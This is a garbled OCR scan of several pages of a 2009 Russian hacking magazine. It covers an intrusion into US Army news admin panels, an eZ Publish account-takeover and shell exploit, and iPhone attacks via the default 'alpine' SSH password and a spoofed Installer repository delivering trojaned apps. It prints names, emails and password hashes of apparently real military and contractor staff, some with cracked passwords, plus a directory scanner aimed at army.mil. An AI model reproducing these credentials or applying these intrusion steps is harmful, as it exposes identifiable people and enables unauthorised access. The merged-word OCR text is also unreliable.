Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

123_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

22.66 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 56 / 156 7 8 9 10 11 12 13 14 15 > Следующая >>>

hang

NOW!

BUY

>>m

w Click

взлом

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Всепопыткисоздатьновостьбылиуспешными, авотудалить– нет. Витоге, созданныепробныеновостиосталисьадминистраторамсайтав качествепочетногораритета

Вотони! Каквидишь, троепользователейимеютуровеньдоступа «system_all». Хэшиэтихпользователейунасбыли, поэтомуделооста- валосьзамалым– взломатьих

[2]patricia.downs:5c6af66e2e7e5fe23c434b3f5c4ec2bf:patricia.

downs@smc.army.mil:

[3]laura.defrancisco:c8b1b73225e5896e06c19b1f609dc863:laura.

defrancisco@hqda.army.mil:

[4]robbie.thompson:b6917881d58688ad396501f773b5d647:robbie. thompson@l-3com.com:

[5]ashley.stetter:ea13ba548da671076ec1a3a03cbd2a40:ashley.

stetter@hqda.army.mil:

[6]kerry.meeker:c8b1b73225e5896e06c19b1f609dc863:kerry.

meeker@hqda.army.mil:

[7]david.hamric:55231502f554ef71faa789d1a135866a:david. hamric@l-3com.com:

[8]will.brall:cb7cd4c336c25560286fe69b55335325:will.brall@

us.army.mil:

[9]assignment.desk:4a29dd4f50d00f8e84480238e4cb3ff0:

assignmentdesk@smc.army.mil:

[10]michael.katsufrakis:fb4b04a6b48d626f4d8c25fb1c3fcba2:

michael.katsufrakis@us.army.mil:

[11]victor.harris:f9bbe1e289e380058aa0dc0500e216ce:victor.

harris@us.army.mil:

[12]emma.dozier:c6e6c426dbc367dfdbfea3d070b5acc3:emma.

dozier@smc.army.mil:

[13]chris.clarke1:e7ea3d9b4e0ea932fbdea34f2b56ed77:chris.

clarke1@us.army.mil:

[14]jacques.bannamon:2928789921c530d855f395bddf87536f:

jacques.bannamon@smc.army.mil:

Сканервбою!

Уровнидоступапользователей, которыеунасбыли, различалисьот

«новичка» (junior) до«главаря» (system_all)

[15] deepa.mahendru:5782db43cea274ab2e45c4f36318aea0:deepa.

mahendru@l-3com.com:

[16]michael.rautio:f956f3f32257f69b4bd165336a9c7869:michael.

rautio@smc.us.army.mil:michael.rautio@smc.us.army.mil:

Некоторыеизрасшифрованныхучетныхзаписейудивлялисвоейпростотой. Напомню, чтостойкостьлюбогопароляилишифраизмеряется степеньюсвоейупорядоченности(энтропией). Измеряетсяонане такойужсложнойформулой: H = Llog2N=L logN/log2, гдеL — количествосимволоввпароле, аN — количествовозможныхсимволов. Скажем, если исследуемыйпароль«ottomotto», тоL=9, аN=26 (столько буквванглийскомалфавитесучетомтольконижнегорегистра). Постатистическимданным, упорядоченность, приходящаясянакаждыйсимволпритакомраскладе, — 4.9 бит, чтоговоритодостаточнойпростоте подборапароля. Например, прииспользованииN=94 (всесимволы ASCII) онаравна6.55. Интересарадитыможешьпосчитатьэнтропию паролей, которыебыливыцепленыизадминскихармейскиххэшей:

b6917881d58688ad396501f773b5d647:7779311

obbie.thompson:b6917881d58688ad396501f773b5d647: robbie.thompson@l-3com.com:

04dac8afe0ca501587bad66f6b5ce5ad:hellokitty

zack.kevit:04dac8afe0ca501587bad66f6b5ce5ad:zack. kevit@l-3com.com:zack.kevit@l-3com.com:

Многиехакерыдлявзломахэшейнеиспользуютсобственныевычислительныемощности. Можновоспользоватьсясуществующимипаблик проектамидлякрекингахэшей. ВСетиихнетакужимало. Нанашем дискетынайдешьспециальныйскриптотменя, которыйделаетэтов миг, прогоняяхэшпо19 популярнымсайтам. Абсолютнодругаяадмин-

каобнаружиласьздесь: http://www4.army.mil/ocpa/admin.

Улыбнуло, чтосамасистемановостныхобновленийтамбылаеледописана. Этоможнобылозаметитьпотому, чтокогдаяпробовалудалять

050	XÀÊÅÐ 03 /123/ 09

hang

NOW!

BUY

w Click

-xcha

hang

NOW!

>> взломw Click

BUY

-x cha

ПервыйгеройизбазыOTF. ОстальныхмыискалиLIMIT’ом

CMS изнутри– таквыглядитинтерфейсобновленияновостейсистемы

ARNEWS

dires.append(i)

или

изменятькакие-либо

новости, онаобращалась

несуществую-

except IOError:

щимскриптам.

pass

РАЗВЕДКААДМИНИСТРАТИВНЫХДИРЕКТОРИЙ

Еслипроанализироватьвесьвзлом, действиязлоумышленника сводилиськэксплуатацииатакикласса«SQL-injection» иразведке административныхдиректорий. Спервыммыболее-менееразобра- лись, теперькоснемсявторого. Дляэтойзадачисуществуетогромное количествоутилит. Методикаихсводитсяктому, чтопутемпосылки HEAD-запросаназаданнуюдиректориюонипроверяюткодответа. Нижеяприведусвойсобственныйскрипт, которыйчастоиспользую вработе. Онделаетвсепотойжесхеме, новдобавоканализируетдиректориипофайлуrobots.txt (наофициальномсайтеАрмииСША, его кстати, небыло). Яиспользуюцентрализованнуюбазувsqlite, которую периодическипополняю.

import os, sys, sqlite3, httplib, re, locale

#-*- coding: utf-8 -*- import thread, sqlite3

#объявляем пустую списковую переменную, куда будут помещаться все найденные неповторяющиеся директории dires = []

#задаем функцию для проверки на наличие директории HEAD’ом

def check(host, p): try:

h = httplib.HTTP(host) h.putrequest('HEAD', p) h.putheader('Host', host) h.putheader('Accept', 'text/html') h.putheader('Accept', 'text/plain') h.endheaders()

errcode, errmsg, headers = h.getreply() if (errcode==200) and (len(headers)!=0):

dires.append(p) except:

pass

#задаем функцию для анализа файла robots.txt, по которому очень часто можно определить закрытые от индексации директории, например, так:

def robots(host): global dires try:

f = urllib.urlopen('http://'+host+'/robots.txt’) line = f.read()

txt = re.findall('Disallow: (.*)$', str(line), re.MULTILINE)

for i in txt:

if i=='/' or i=='/\r': pass

else:

# основная функция, которая будет по заданной таблице

прогонять всю колонку директорий и передавать на скорм-

ление двум предыдущим функциям через потоки

def dirs(host):

global dires

conn = sqlite3.connect('db')

c = conn.cursor()

c.execute('SELECT * FROM Directories')

for row in c:

thread.start_new_thread(check,(host, row[1]))

thread.start_new_thread(robots, (host,))

# на вооружение python-кодерам: вот так можно очень

просто избавиться от повторений в списках

list(set(dires))

# выполняем алфавитную сортировку

locale.setlocale(locale.LC_ALL, '')

tmp = [x.swapcase() for x in list(set(dires))] tmp.sort(key=locale.strxfrm)

tmp = [x.swapcase() for x in tmp] return tmp

dirs('army.mil')

Другаятулза, окоторойследуетпоговоритьподробнее— OWSP Dirbuster (онейнетакдавнорассказалettee). Этомногопоточнаяутилита, написаннаянаJAVA. Предназначенаонадлябрутасабдоменных именидиректорий(втомчисле, директорийизвестныхWEB-прило-

жений). Официальныйсайтпроекта— owasp.org/index.php/Category: OWASP_DirBuster_Project. Синтаксисзапускавыглядиттак: java

-jar DirBuster-0.12.jar -H -u https://127.0.0.1/ (вконсоли)

иjava -jar DirBuster-0.12.jar -u https://127.0.0.1/ (GUI-

режим).

Зачемэтоюзать? Деловтом, чтозачастуюпроверкикодаответапо «200» недостаточно, чтобыпрошаритьналичиедиректории, потомукакнанесуществующиедиректориионтожеможетприходить, выдаваяприэтомстраничкусописаниемошибки, подготовленную разработчиками. Втакомслучаетребуетсяанализироватьнетолько код, ноиконтент, что, кслову, умеетэтапрограмма. Наофициальном сайтеможнонайтиогромныелистыдлябрута(самыйбольшойизних насчитываетоколо1273819 директорий).

МОРАЛЬСЕЙБАСНИ

Дажетакиесерьезныеимаститыепроекты, какофициальныйсайт АрмииСША, имеютбанальныебрешивуязвимости. Помни, чтовсе описанноевстатьебылопроделаноисключительнокакчастьжурналистскогорасследования, инестоитповторятьэтидействияради забавы. Игратьсяссайтамивоенногоигосударственногосектора можетбытьопасно. z

XÀÊÅÐ 03 /123/ 09	051

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
w Click					BUY				>>m
w Click				to					>>m


w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

взлом

S4AVRD0W

/ S4AVRD0W@P0C.RU /

					hang		e
				C			e	E
			X					E
		-							d
		F								t
	D									i
	D									r
P							NOW!			o
P
						BUY
					to	BUY
w		Click			to						m
w		Click									m
w
	w									o
	.								.c
			p					g
				df			n		e
					-x cha

ЭЛЕГАНТНЫЙВЗЛОМ

CMS EZ PUBLISH

ВАГОНБАГОВВПОПУЛЯРНОЙCMS

Было уже за полночь, когда в аську мне от старого знакомого прилетело сообщение со ссылкой на один web-узел в интернете. В сообщении говорилось, что в настоящее время проводятся работы по анализу защищенности этого ресурса. И если у меня есть желание поучаствовать, то моя помощь была бы крайне полезна.

оуказаннойссылкемоемувзорупредсталсимпатичныйсайт Недолгодумая, софсайтабыластянутауязвимаяверсияCMS, аналогич-

Псубогойнавигацией. Поглумившисьнемногонаддизайном, наятой, чтоиспользоваласьнаисследуемомресурсе, сцельюпроведе-

исследованияяначалпостандартнойсхеме— споиска наиболееопасныхбаговнасторонесервера. Приобраще-

ниикновостномуразделусразужебросилосьвглазаиспользование mod_rewrite, которыйпоройзатрудняетэксплуатациюряданаиболееин- тересныхserver-side уязвимостей. Поверхностныйсерфингпоструктуре сайтапоказал, чтоникакимиSQL-инъекциямиипрочимивкусностямитут инепахнет. Этолишьподогревалоинтерескпоискууязвимостей. Продолжаяисследованиесайта, вHTML-кодеразличныхегоразделов янаткнулсянаинтереснуюстроку: content="eZ publish". Гугление посигнатурепоказало, чторесурс, видимо, базируетсянаOpen source CMS eZPublish. Черезпаруминутпредположениеполучилоподтверждение. Стоиломнеобратитьсякстранице/ezinfo/about, сервервыплюнулточнуюверсиюCMS совсемиустановленнымидополнениями. Это былаeZPublish версии3.9.3.

НаофсайтеразработчикаэтойCMS аккуратнособраныуязвимостипод старыеверсиидвижек(чтокрайнеприятно). Интереснымибагамив eZPublish, надосказать, былиуязвимости, связанныесподнятиемпривилегий(privilege escalation). Такихоказалосьажцелыхдве. Но, какэто обычнобывает, вбюллетеняхбезопасностисведения, раскрывающиеих эксплуатацию, отсутствовали. Блужданияпобагтрекамтакжерезультатов непринесли.

ниятестированиядвижкинауровнеwhite-box. Послезагрузкикомбо- инсталлятора«All-In-One» сумнымвидомначаласьустановкапродукта, котораясводиласьк многократномупрохождениюдиалоговаля«Next». Затембраузеротобразилдиалогустановкиновогосайта. Вскоревмоем распоряжениибылполигондлятестирования.

ПЕРВЫЙВЗГЛЯДНАПАЦИЕНТА

Послетого, какприложениебылоразвернутовтестовойсреде, браузер как-томашинальнооказалсявпанелиадминистрированиясайтом. Покопавшисьтамнемного, явключилотладочныйрежим, которыйпозволялвидетьвбраузеревсезапросы, передаваемыекБДвпроцессе серфингапосайту. Такжеэтопозволялоотслеживатьлогикуработы приложения.

Беглыйосмотрадминкипоказал, чтомогутвозникнутьсложностинаэта- пеорганизацииweb-shell, таккакCMS непозволяетработатьнепосредственноссервернымкодом(читай— PHP). Приложениепредусматривало работуссайтомтольконауровнеегоконтента. Побольшомусчетуэто правильно, нодляцелейпроникновения, безусловно, неестьгуд. Другоеразочарованиебылосвязаносфайлом«.htaccess» вкорневой директорииweb-сервера, которыйсодержалследующиедирективы:

052	XÀÊÅÐ 03 /123/ 09

hang

NOW!

BUY

w Click

-xcha

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
						BUY
взломw					to	BUY
	w Click				to
	w Click									o	m
		w								o
		.							.c
			p					g
				df			n		e
					-x cha

Использованиеотладочногорежима

Успешнаярегистрацияпользователя

УведомлениеобуязвимостинаофсайтеразработчикаCMS

...

<FilesMatch "."> order allow,deny deny from all

</FilesMatch>

<FilesMatch "(index\.php|\

.(gif|jpe?g|png|css|js|html)|var(.+)storage. pdf(.+)\.pdf)$">

order allow,deny allow from all

</FilesMatch> RewriteEngine On

RewriteRule !\.(gif|jpe?g|png|css|js|html)|v ar(.+)storage.pdf(.+)\.pdf$ index.php

...

Наличиеподобнойконфигурациисвидетельствуетоневоз- можностиобращенияккаким-либофайламвпространстве web-серверавобходлогикиегоработы. Отсюдавытекает дванеприятныхмоментадляатакующего. Во-первых,

	info
	• Приисследовании
	web-приложений
	методомwhite-box
	крайнеполезно
	включениеразлич-
невозможновоспользоватьсяуязвимостямипутемпрямого	ныхотладочных
обращенияксервернымсценариям, вкоторыхнепроис-	режимов.
ходятсоответствующиепроверки. Во-вторых, возникают
трудностипризаливкеииспользованииweb-shell (обра-	• Функцияmktime()
титьсякнемунапрямуюнеполучится).	возвращаетметку
Заоблачныхперспективпопроведениюуспешнойатакине	времениUnix,
предвещалиповерхностныйвзгляднаисходныйкодпри-	соответствующуюце-
ложения. РазработчикиэтойCMS, видимо, непонаслышке	ломучислу, равному
знакомыстемойбезопасногоweb-программирования. Но	разницевсекундах
что-топодсказывало: своикосякиестьитут, надотолько	междузаданной
лучшеихразглядеть.	датой/временеми
ВернувшисьнаофсайтeZPublish иперейдянастраницус	началомЭпохиUnix
advisory, ясталвыбиратьмишеньдляатаки. Извсего, что	(The Unix Epoch, 1
тутрасполагалось, меняпривлеклоуведомление«Недо-	января1970 г).
статочнаяобработкаформысделалавозможнымподнятие
привилегии». Вбюллетенетакжеговорилось, чтоуязви-
мостьсвязанасрегистрациейновогопользователя. Нучто
ж, посмотримнаэтотпроцесспоближе.
ЗапустивOWASP WebScarab (кстати, рекомендуюкисполь-
зованию!) инастроивеговкачествелокальногопрокси, я
обратилсякстраницерегистрацииновогопользователя.
Стоиломневбитьвформурегистрациипроизвольные
данные, какбраузерредиректомперешелнастраницу
/user/success, гдесообщалось, чтопроцессзавершился
успешноидальнейшиеинструкциивысланынауказанный	warning
мнойприрегистрацииe-mail. Здорово! ВоттолькоSMTP-	Внимание! Инфор-
транспортвмоемслучаенастроеннебыл, даитестовый	мацияпредставлена
полигоннаходилсявавтономнойсети. Казалосьбы, сразу	исключительно
имеетсмыслпосорцамприложенияподглядеть, какимоб-	сцельюознаком-
разомпроисходитактивацияновогопользователя, — если	ления! Ниавтор, ни
бынеодно«но».	редакциязатвои
Когдаяпросматривалпроцессрегистрациипользователя	действияприисполь-
черезWebScarab, вниманиемоепривлекли нестандар-	зованииописанных
тныеименаидентификаторовформы, передаваемой	уязвимостейответст-
серверу. Заключаласьнестандартностьвтом, чтона	венностиненесут!

XÀÊÅÐ 03 /123/ 09	053

hang

NOW!

Click

BUY

>>m

взлом

-xcha

hang

NOW!

BUY

w Click

-x cha

Активацияучетнойзаписиадминистратора

			ТАКРОЖДАЮТСЯZERO-DAY



		Впервуюочередьяпринялсяизучатьмодули, связанныеспроцессами
		аутентификациииавторизации. Ивпроцессеэтоготворческогомероп-
		риятиянаткнулсянаинтересныйучастоккода:

		...
			if( $type == EZ_USER_PASSWORD_HASH_MD5_USER )
		{
			$str = md5( "$user\n$password" );
		}
		...

		Этокодсозданияхеша, покоторомупроисходитпроцессаутентификации.
		То, чтовкачестве«соли» используетсяимяпользователя, — практика
		распространеннаяиейуженикогонеудивишь. Вкачестверазделителя
		используетсясимволпереводастроки, вследствиечегоинструменты,

		которымимыпривыклипользоваться, откровеннолажают(таккаквнихне
	Данные, передаваемыесерверувпроцессерегистрации
	Данные, передаваемыесерверувпроцессерегистрации	предусмотренподобныйфичесет). Так, например, InsidePro Password Pro

		идетлесомипривстречесподобнымихешамиприходитсяписатьсвой
концахименпараметровформыиспользовалисьцифровыезначе-		брутфорсер. Добравшисьдопроцессаактивацииновогопользователяи
	ния, вкоторыхявнопрослеживаласьпрямаяпоследовательность.	лицезревкод, представленныйниже, янесмогсдержатьухмылки:
	Крометого, интересныммоментомбылото, чтовформеприсутствовал
	скрытыйпараметрсименемUserId, которыйсоответствовалвнут-	...
	реннемуидентификаторупользователявтаблице«ezuser» мускуля.		// Create enable account hash and send it to the newly
	Стоитотметить, чтоидентификаторпервогоадминистратораявляется		registered user
	постояннымдлявсехверсийэтойCMS. Этотак, кслову.		$hash = md5( mktime( ) . $user->attribute(
	Послетого, какпроцессрегистрациибылповторендлядругогополь-		'contentobject_id' )
	зователя, аданныеформприрегистрациипервогоивторогопользо-	...
	вателейсравнены, догадкаподтвердилась: идентификаторыформы
	вателейсравнены, догадкаподтвердилась: идентификаторыформы
	былипоследовательными. Улавливаешьходмысли, откуданогирастут	Вэтихстрокахкодасодержитсяуязвимость, котораясвязанасзависи-
	уадвизори? Именно! Обладаяэтойинформацией, несложнопосчитать,	мостьюфункцииmktime( ) отвремени, установленногонаweb-сервере.
	какиеданныедолжныбытьуказаныприрегистрацииадминистраторас	Значение‘contentobject_id’ — этоидентификаторпользователявбазе,
	постояннымвнутреннимидентификатором. Наскоруюрукуяприкрутил	которыйпоследовательноменяетсяприрегистрацииновыхпользова-
	SMTP-транспорткCMS иотправилсыройPOST-запроснарегистрацию	телей. Такимобразом, знаявремянаудаленномсервересeZPublish,
	аккаунтасидентификаторомдефолтовогоадминистраторасизвестным	можнодостаточнотривиальноактивироватьучетнуюзаписьбезполуче-
	мнеадресомэлектроннойпочтыипаролем. Намейлсвалилосьписьмо,	нияактивационнойссылкинамейл. Установленноевремянаудаленном
	содержащеессылкудляактивацииэтогопользователя. Пользователь	серверепередаетсякаждыйразвзаголовкахпакетовHTTP, возвращае-
	былуспешноактивирован, итакимобразомполучендоступкCMS с	мыхсервером, поэтомупроблемтуттакженевозникает.
	правамиадминистраторавней.	Наосновеэтихданныхбылнаписансплоит, которыйменяетпароль
	Однако радость длилась недолго. Хотя я натравил сплоит на сайт,	администратораCMS иактивируетегоучетнуюзапись. Вэтотразудача
	с которого все началось, письмо, содержащее ссылку активации	быланамоейстороне, иялегкополучилдоступсправамиадминистра-
	администратора с заданным мною паролем, упорно не приходило.	тораeZPublish насервереклиента.
	По всей видимости, это могло означать, что на target-ресурсе почта
	во внешний мир не ходила (либо вообще не настроена). Вот так вот,		СПУСКАЕМСЯНАУРОВЕНЬОСИ


	халява прошла стороной. И с этими мыслями я погрузился в сорцы	Помнишь, всамомначалеговорилось, чтоeZPublish непозволяетре-
	CMS.	дактироватьPHP? Вотобэтомяивспомнил, оказавшисьвнутриCMS под

054	XÀÊÅÐ 03 /123/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ИспользованиедвухуязвимостейвeZPublish дляполученияпривилегийадминистратора

Выполнениепроизвольныхкоманднасервере

dvd

Нанашемдискеты найдешьpoc-коддля эксплуатацииуязвимостей, описанных встатье.

админом. Можнобылобыостановитьсянадостигнутом, ноуменяпоявилосьжеланиеспуститьсяещениже: довыполнениякоманднасервере. Вновь, ноужеболеепристальноивнимательно, япробежалсяпоадминке. Длясебяотметил, чтоможетполучитьсяреализоватьидеивыполне- нияпроизвольногоPHP-кодапутемизмененияпеременныхокружения CMS. Ноэтузатеюярешилоставитьнакрайнийслучай. НаиболеепростымрешениемполученияшеллаказаласьустановкапакетовeZPublish, возможностьчегоприсутствовалавпанелиадминистратора.

ОбратившисьужевкоторыйразкофсайтуeZPublish, япроследовалк репозитариюдоступныхпакетовдлязагрузкиподисследуемуюверсию ислилксебенамашинупаруготовыхпримеров. Полученныефайлы имелизагадочноерасширение«ezpkg». Стоилоизменитьегона«zip», какфайлыбезпроблемоткрылись— внихсодержалосьещепоодному файлусрасширением«ezpkg». Проделаваналогичнуюоперациюсвложениями, яувиделобычныйструктурированныйкаталог, содержащий различныефайлы(втомчисле, срасширениямиPHP), вкорнекоторого находилсяфайл«package.xml».

ПослеустановкипакетанатестовыйсерверeZPublish, кромепоявления новогокаталогавструктуреweb-сервераинадписивразделеадминис- трированияCMS отом, чтовсистемеустановлентакой-топакет, никаких измененийнепроизошло. Немногоосмотревшись, япростодобавилв разобранныйпакетсвойшеллифайл«.htaccess», вкоторомпереопределилFilesMatch иотключилRewriteEngine. Затемзалилэтотзаряженныйпакетнамногострадальныйобследуемыйсервер, номеняждало

XÀÊÅÐ 03 /123/ 09

новоеразочарование— вконфигурацииapache присутствоваладирек-

тива«AllowOverride None», ипереопределитьдирективы«FilesMatch» с

использованиемфайла «.htaccess» непредставлялосьвозможным. Ещенемноговременибылопотраченонаанализпроцессазаливки файлаиразборфайла«xml», содержащегосявпакете. Этопозволиловыявитьуязвимостьтипа«Обходкаталога» (Path traversal), котораясвязана собработкойфайла«package.xml». Предполагая, чтонекоторыефайлы наweb-серверемогутбытьперезаписаны, яподготовилновыйпакет, которыйдолженбылприустановкеперезаписатьфайл«ezinfo.php». Сталовозможным, невыходязарамкилогикиработыприложенияииспользуяуязвимостинаразныхэтапахегофункционирования, получить доступккоманднойстрокеоси. Фактическиэтопозволяетскомпромети- роватьвесьweb-сервер. Вмоемслучаебылиполученыправаapache, и хотяиспользуемоеядронаисследуемомресурсепозволялоподняться дорута, делатьяэтогонестал, таккакэтидействияужевыходилиза рамкианализазащищенностиweb-приложения. Поэтомуяотписалсяо своихрезультатахколлегепоцехуисчувствомглубокогоудовлетворения потопалспать.

ЗАНАВЕС

НеоднимиSQL-инъекциями, File-инклудингомипрочимипряниками насыщенмирweb’а. Найдетсяместоиболееэкзотическимбагам, которыевсовокупностипоройпозволяютдобитьсявысокихрезультатовпри проникновении. Помниобэтом. Иудачитебевисследованиях! z

055

hang

NOW!

BUY

>>m

w Click

взлом

-xcha

D0ZNP

/ HTTP://OXOD.RU /

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ЯБЛОЧНОЕ

ПЮРЕ

АТАКУЕМAPPLE IPHONE

Одним прекрасным днем мир увидел революцию в области мобильных телефонов. Знаменитая Apple – мать всех макинтошей и айподов в придачу – выпустила на рынок свой первый Apple iPhone. Невероятно удобный графический интерфейс, большой экран, мощное железо и всего четыре кнопки!

Но самое главное, что было в новом телефоне — операционная система. Настоящий Unix based, darwin kernel! Она так и призывала к экспериментам.

IPHONE 3G: «ПРОЩАЙТЕ, ХАКЕРЫ!»

Перваямодельтелефонаещенеуспеласостариться, какApple выпустила нарынокновыйiPhone 3g. Отличийэтоймоделиотсвоегопредшественникавсеготри: GSM-контроллерсподдержкой3g, A-GPS навигационный контроллерикорпус. Самособойразумеется, новоежелезопотребовало новой прошивки, и свет увидел вторую ветку фирмварей. Я не буду подробно описывать все фичи этих прошивок, их можно без труда найти в инете. Скажутолько, чтообещанногокопи-пастатакинесделали(намо- ментнаписанияэтойстатьипоследняяпрошивка— 2.2).

ВышелиофициальныйSDK, ирепозиторий-магазинApple Store. Вторая веткабылазарелизенаидляпервогопоколениятелефонов, поэтомувсе

новые программы универсальны. Разумеется, хакеры не заставили себя ждатьивыпустилиподновыепрошивкианлокииджеилбрейки.

Самой популярной программой для разблокировки iPhone стала

WinPWN.

Вместесразблокировкойпредлагаетсяпоставитьменеджерыпакетов Installer (уже 4-ая версия самого первого менеджера) и Cydia (менеджер пакетов на базе Debian package). В неофициальных репозиториях можнонайтивкусныепатчиидополнения, утилитыихаки, которыхнет в Apple Store. Поэтому Installer и Cydia до сих пор пользуются популярностью, и списывать со счетов атаки на эти приложения смысла неимеет.

056	XÀÊÅÐ 03 /123/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha


Рекурсиявотображенииiframe спустымилиневалиднымsrc				Отображениедокументоввнутрипочтовика. Интересно, кактамвыпол-
				няютсямакросы:)

	АТАКА0. SSHD DEFAULT			Захэшамискрываетсямагическоесловоalpine.Такимобразом,получаем


Самаянетруднаяисамаядейственнаяатака. Идеяпроста, какдвабайта:				две связки логин-пароль, с которыми вероятнее всего пустит на iPhone
многие пользователи iPhone устанавливают SSH-демон, даже не подоз-				с открытым 22 портом: mobile/alpine и root/alpine. Неслабо? Да, вот так
ревая, зачем он нужен. Он используется, например, в программе iPhone				сразу— рутовыйдоступ, безлишнихпроблем. Нестоитсчитать, чтонайти
tunnel, с помощью которой эмулируется USB network. Другие пользова-				такую«халяву»наулицахтяжело.Поверьмне:сделатьэтогораздопроще,
телиспециальноставятSSHD, нопоменятьпарольпоумолчаниюнесчи-				чем можно было бы подумать (такое раздолье и заставило меня описать
таютнужным(илипопростуленятся). Вотлистингфайла /etc/master.				эту тупую и незатейливую атаку). Даже сейчас, когда больше половины
passwd:				iPhone—белые3gототечественныхоператоров,открытыйпорт22далеко
				нередкость.
##
	# User Database				АТАКА1. INSTALLER REPOSITORY SPOOFING


#				Идея этой атаки пришла мне в голову, когда я первый раз взглянул
	# This file is the authoritative user database.			на менеджер пакетов Installer от RipDev. Соль в том, чтобы создать
##				поддельный репозиторий на базе обычного веб-сервера (например,
	nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/			встроенноговлюбуюточкудоступаурезанногоhttpd изbusybox). Затем
	false			прописать DNS-запись с оригинальным именем репозитория разра-
	root:/smx7MYTQIi2M:0:0::0:0:System		Administrator:/var/	ботчика и IP-адресом нашего веб-сервера (тоже решается средства-
	root:/bin/sh			ми busy box). После этого iPhone-пользователи, присоединившиеся к
	mobile:/smx7MYTQIi2M:501:501::0:0:MobileUser:/var/mobile:/			нашему вкусному бесплатному хотспоту (который для пущей красоты
	bin/sh
	bin/sh			можно назвать как-нибудь типа Godlen_Wifi :)) и обновившие свои
	daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false			программы, получат вместо них похаканные мобильные трояны. Ре-
	_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/			позиторий представляет собой xml-конфиги и zip-файлы с програм-
	false			мами. Никакой подписи пакетов и проверки целостности, спуффинг
	_mdnsresponder:*:65:65::0:0:mDNSResponder:/var/empty:/usr/			в чистом виде. Итак, начнем! Скачиваем оригинальные скрипты для
	bin/false			создания репозитория:
	_sshd:*:75:75::0:0:sshd Privilege		separation:/var/empty:/
	usr/bin/false				http://i.ripdev.com/seed/repo-r1050.zip
	_unknown:*:99:99::0:0:Unknown	User:/var/empty:/usr/bin/
	_unknown:*:99:99::0:0:Unknown	User:/var/empty:/usr/bin/
	false			Остается лишь найти приложение, которое заведомо будет установле-

XÀÊÅÐ 03 /123/ 09	057

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY					>>m
w Click				to	BUY						взлом
w Click				to							взлом
w
	w									o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Отличноеприменениеотличномутелефону

но у всех пользователей. Нетрудно догадаться, что таким является сам Installer. Вот оригинальный конфиг производителя http://i.ripdev.com/ info/index-2.2.plist, авернее, таегочасть, котораяотвечаетзаэтусофтину:

<dict>

<key>category</key>

<string>System</string>

<key>identifier</key>

<string>com.ripdev.install</string>

<string>Installer</string>

<key>version</key>

<key>description</key>

<string>THE Installer. Now with resumeable downloads, optimized and tested for 2.1 and 2.2, rebuilds installed apps on the fly, supports proxies, Lua scripting language and more!

Final release. Includes English, Russian and Ukranian localizations.

</string>

<string>http://i.ripdev.com/info/icons/com.ripdev. install-4.0.png</string>

<key>url</key> <string>http://i.ripdev.com/info/com.ripdev.install- 4.0-2.2.plist</string>

</dict>

Чтобы заставить жертву поверить в обновление приложения, испра-

вимпараметры-ключиdate иversion напроизвольныечисла, заведомобольшеданных. Теперьперейдемкxml-конфигу изключаurl:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0// EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">

<dict>

<key>identifier</key>

<string>com.ripdev.install</string>

<string>Installer</string>

<key>version</key>

<key>description</key>

<string>THE Installer. Now with resumeable downloads, optimized and tested for 2.1 and 2.2, rebuilds installed apps on the fly, supports proxies, Lua scripting language and more!

Final release. Includes English, Russian and Ukranian localizations.

</string>

<string>http://i.ripdev.com/info/icons/com.ripdev. install-4.0.png</string>

<key>location</key> <string>http://i.ripdev.com/packages/System/installer40.zip</string>

</dict>

</plist>

Исправим ключ version на такой же, который выставили в предыдущем файле. Изменим ключ size, чтобы он соответствовал размеру хакнутого файлаприложения. Последнийштрих— ключhash. Смотримскачанный исходникрепозиторияregenerate.php:

$r['hash'] = md5_file($fullpath);

Видим,каквсепросто,никакихнаворотов.Снимаемхэшотлже-приложе- ния и кладем в значение ключа. Все готово, опционально можно испра- витьещеиurl-ключ— этоуженичегонеизменит. Думаю, темараскрыта. Отом, каксоздатьтрояндляiPhone ичтодляэтогопотребуется, япостараюсьрассказатьвследующихстатьях.

АТАКА2. EXPLOITS

Уязвимости в основном найдены в веб-браузере Safari и почтовике. Во многом ошибки повторяют найденные ранее в версиях под MacOs. Комментариинаэтутемуможнонайтивихисходныхкодах.

